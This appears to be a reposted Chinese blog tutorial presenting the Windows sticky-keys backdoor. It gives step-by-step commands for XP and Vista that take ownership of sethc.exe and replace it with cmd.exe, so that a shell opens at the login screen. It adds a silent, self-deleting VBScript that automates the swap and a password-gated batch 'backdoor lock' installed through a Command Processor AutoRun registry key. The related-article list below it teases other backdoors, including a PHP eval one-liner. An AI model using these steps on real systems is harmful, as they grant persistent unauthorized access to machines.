变态入侵之有史以来最酷的Windows后门sethc.exe
后门原理:
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
第二句最有意思了.自动应答....以前就遇到过类似的问题
再更新.加个自删除,简化代码...
代码如下:
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
后门锁扩展:
allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证
用下面的后门锁的方法是 把代码保存为bdlock.bat
然后修改注册表位置即可
代码如下:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="bdlock.bat"
@Echo Off
title 后门登陆验证
color a
cls
set temprandom=%RANDOM%
echo 请输入验证码:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后门服务器验证
rem 如果没有后门验证服务器请rem注释掉下一行代码
if exist \192.168.8.8\backdoor$\pass goto passcheck
)
echo 验证失败
pause
exit
:passcheck
echo 验证成功
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
:allyesno
Set Errorlevel=>nul
Echo 请输入验证密码?
Set password=allyesno Is a pig>nul
Set/p password=
rem 万能密码
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e
If %time:~1,1%==5 Set timechange=f
If %time:~1,1%==6 Set timechange=g
If %time:~1,1%==7 Set timechange=h
If %time:~1,1%==8 Set timechange=i
If %time:~1,1%==9 Set timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
Echo 请联系客服咨询正确密码!&Goto allyesno
:End
Set password=>nul
Set Errorlevel=>nul
Echo
:endx
相关推荐
-
C++映像劫持后门实例分析
本文实例讲述了C++映像劫持后门的方法.分享给大家供大家参考.具体如下: // freeheart.cpp : Defines the entry point for the console application. //学习交流使用,违法使用后果自负. // by:cnblogs.com/blogg time 2013.5.24 // argv 0 = freeheart.exe // argv 1 = -i // argv 2 = name.exe // argv 3 = 1 2 3 //
-
C++动态规划之背包问题解决方法
本文实例讲述了C++动态规划之背包问题解决方法.分享给大家供大家参考.具体分析如下: 问题描述: 背包的最大容量为W,有N件物品,每件物品重量为w,价值为p,怎样选择物品能使得背包里的物品价值最大? 输入: 10 3 (W,N) 4 5 (w,p) 6 7 (w,p) 8 9 (w,p) 实现代码: #include <stdio.h> #define THING 20 #define WEIGHT 100 int arr[THING][WEIGHT]; /* 背包容量为wei
-
Linux下查找后门程序 CentOS 查后门程序的shell脚本
每个进程都会有一个PID,而每一个PID都会在/proc目录下有一个相应的目录,这是linux(当前内核2.6)系统的实现. 一般后门程序,在ps等进程查看工具里找不到,因为这些常用工具甚至系统库在系统被入侵之后基本上已经被动过手脚(网上流传着大量的rootkit.假如是内核级的木马,那么该方法就无效了). 因为修改系统内核相对复杂(假如内核被修改过,或者是内核级的木马,就更难发现了),所以在/proc下,基本上还都可以找到木马的痕迹. 思路: 在/proc中存在的进程ID,在 ps 中查看不到
-
VBS+MSWinsock打造灵巧UDP后门的相关资料
大概在一年前,VBS脚本病毒又揭起一阵热潮,一大群VBS病毒在互联网上盛行.那时的VBS病毒几乎都是用FSO.MAPI作为一个病毒传染引擎,所以我就想,VBS可否访问网络呢?如果它也能进行端口的连接,那就神奇了.从此之后,我就努力去找有关VBS的网络类的资料,可惜找了好久,什么收获也没有,直到一个月前高考结束了,我才可以静下来搞这个东西,并终于有了一点进展. 现在分析一下VBS的运作原理吧.VBS的全称是"Visual Basic Scripts",由于VBS是由Visual Basi
-
VC++植物大战僵尸中文版修改器实现代码
本文实例讲述了VC++植物大战僵尸中文版修改器实现代码.分享给大家供大家参考.具体分析如下: 这是很简单的一个辅助工具,关键是游戏数据的分析,实现了两个功能,无限阳光和无冷却.特别注意的一下,如果用VS2008编译的话,调试的时候是正常的,但编译后功能就会失效,这是因为OpenProcess权限的问题,需要提权,在VC6下是正常的. void CzhiwuDlg::OnBnClickedButton1() { //无限阳光代码 HWND hJubing; DWORD lID; DWORD bas
-
利用wsc制作的一个asp后门
<?xml version="1.0" encoding="gb2312" standalone="yes"?> <?component error="true" debug="true"?> <package> <component id="haiyangtop"> <public> <method name="
-
C++实现基于控制台界面的吃豆子游戏
本文实例讲述了C++实现基于控制台界面的吃豆子游戏.分享给大家供大家参考.具体分析如下: 程序运行界面如下所示: ESC键可退出游戏. main.cpp源文件如下: #include "lib.h" #pragma once extern int level; int main() { FOOD food; WALL wall; BODY CurPos; HALL hall; int iExit = 0; while(1) { if(iExit) break; Init(&fo
-
C++动态规划之最长公子序列实例
本文实例讲述了C++动态规划之最长公子序列解决方法.分享给大家供大家参考.具体分析如下: 问题描述: 求出两个字符串中的最长公子序列的长度. 输入: csblog belong 输出: max length = 4 实现代码: #include <stdio.h> #include <string.h> int arr[200][200]; /* 表示str1的前i位和str2的前j位的最长公子序列的长度 */ int main() { char str1[100],str2[10
-
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
今天一个客户的服务器频繁被写入: mm.php 内容为: 复制代码 代码如下: <?eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") /
-
变态入侵之有史以来最酷的Windows后门sethc.exe
后门原理: 在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开.这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了. XP: 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%\system32\dllcache ren sethc.exe *.ex~ cd %widnir%\system32 copy /y cmd.exe sethc.exe V
-
Win2003服务器系统文件权限设置小结
不多说了,下面将说明需要设置权限的系统文件,设置为只有Administrators组可以访问,并且拒绝Guests组访问. "%SystemDrive%/boot.ini" Windows主要依赖Boot.ini文件来确定计算机在重启(引导)过程中显示的可供选取的操作系统类别 "%SystemDrive%/AUTOEXEC.BAT" 装有DOS或 Windows操作系统的计算机在启动的 时候,都要自动执行 AUTOEXEC.BAT 批处理文件 "%Syst
-
WINDOWS漏洞:粘置键
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开.这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了. 参考McafeeAvertLabs: http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/ XP: 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%\system32\dll
-
sql2005 sa执行命令方法总结
一.xp_cmdshell EXEC master..xp_cmdshell 'ipconfig' 开启xp_cmdshell: -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the currently configured value for advanced options. RECONFIGURE GO -- To enable
-
破解Vista登陆密码Shift按五下轻松
安装XP+Vista双系统的用户越来越多,不过总有些马大哈们会忘记Vista账户密码.由于Vista采用比XP更为严格的登录认证,如果遗忘登录密码,我们是很难进入系统的.不过,<微软在登录界面有一个粘滞键漏洞,可以用它来进入Vista. 粘滞键漏洞是指我们在登录界面按五下Shif启动粘滞键(系统目录下的sethc.exe),因此我们可以在XP下用cmd.exe替换sethc.exe启动命令提示符,然后利用命令提示符进入Vista重置账户密码. 这里双系统假设为C盘为XP,D盘为Vista. 第一
-
服务器安全问题汇总 让你的服务器更安全
服务器安装McAfee + 彩影ARP防火墙 很不错. (更多资料可以查看s.jb51.net里面的内容.)这是一个很的害厉黑客告诉我的,说只有安装了这二样他才没着. 服务器杀毒. 360safe检查服务器安全问题(用完就删,千万不要保留) a) 清理恶意插件. b) 清理无用软件. c) 修复系统漏洞. d) 查杀流行木马. e) 关闭无用进程/关闭无用启动项/关闭无用服务. 检查服务器安全 a) 查看WEB站点是否正常访问. l 有没有多出新的站点? l 站点使用的是什么数据库? l 站点权
-
Windows 2003 服务器安全设置图文教程
一.系统的安装 1.按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面. 2.IIS6.0的安装 开始菜单->控制面板->添加或删除程序->添加/删除Windows组件 应用程序 ---ASP.NET(可选) |--启用网络 COM+ 访问(必选) |--Internet 信息服务(IIS)---Internet 信息服务管理器(必选) |--公用文件(必选) |--万维网服务---Active Server pages(必选) |--Int
-
Windows Server 2003 系统安全配置方法
一.系统的安装 1.按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面. 2.IIS6.0的安装 开始菜单->控制面板->添加或删除程序->添加/删除Windows组件 应用程序 ---ASP.NET(可选) |--启用网络 COM+ 访问(必选) |--Internet 信息服务(IIS)---Internet 信息服务管理器(必选) |--公用文件(必选) |--万维网服务---Active Server pages(必选) |--Int
-
Windows Internet服务器安全配置指南原理篇第1/2页
我们现在开始从入侵者的第一步开始.对应的开始加固已有的windows系统. 1.扫描 这是入侵者在刚开始要做的第一步.比如搜索有漏洞的服务. 对应措施:端口限制 以下所有规则.都需要选择镜像,否则会导致无法连接 我们需要作的就是打开服务所需要的端口.而将其他的端口一律屏蔽 2.下载信息 这里主要是通过URL SCAN.来过滤一些非法请求 对应措施:过滤相应包 我们通过安全URL SCAN并且设置urlscan.ini中的DenyExtensions字段 来阻止特定结尾的文件的执行
-
Windows 服务器组件安全设置策略
A.卸载WScript.Shell 和 Shell.application 组件,将下面的代码保存为一个.BAT文件执行(分2000和2003系统) windows2000.bat regsvr32/u C:\WINNT\System32\wshom.ocx del C:\WINNT\System32\wshom.ocx regsvr32/u C:\WINNT\system32\shell32.dll del C:\WINNT\system32\shell32.dll windows2003.b